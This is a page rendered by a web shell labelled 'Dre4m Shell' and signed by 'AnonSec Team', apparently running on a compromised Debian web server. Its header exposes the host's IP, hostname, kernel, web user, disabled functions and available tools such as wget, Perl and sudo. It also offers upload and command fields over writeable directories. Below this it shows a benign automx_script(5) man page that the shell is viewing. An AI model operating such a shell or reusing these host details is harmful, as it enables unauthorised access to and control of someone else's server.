Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 3.144.34.110
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /srv/automx/automx-master/doc/txt/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /srv/automx/automx-master/doc/txt/automx_script.5.txt
automx_script

     Date:      02/08/2013
   Subtitle:    automx script backend configuration parameters
Manual Section: 5
 Manual Group:  automx
  Copyright:    This document has been placed in the public domain.

Description

The automx_sript(5) man page specifies all parameters that control access from
within automx to a script backend.

Parameters

result_attrs (default: none)

    Specifies a list of one or more variables. The output of the external
    script will assign values to these variables. Results will be assigned in
    the same order as variables have been listed:

    result_attrs = server, email, auth, socket

Important

automx_script(5) does not check if the number of values returned matches the
ones expected. Too many return values will be discarded. If the script returns
too few automx_script(5) will use the corresponding result attribute name.

script (default: none)

    Specifies the absolute path to the script which should be run by the
    backend automx_script(5) backend:

    script = /usr/local/bin/example_com.sh "%s"

separator (default: whitespace)

    Specifies the character that separates values returned by the external
    script:

    separator = ,

Authors

Christian Roessner <cr@sys4.de>
    Wrote the program.
Michael Menge
    Wrote and contributed this backend.
Patrick Ben Koetter <p@sys4.de>
    Wrote the documentation.

See also

automx(8), automx.conf(5), automx_ldap(5), automx_script(5), automx_sql(5),
automx-test(1)


Anon7 - 2022
AnonSec Team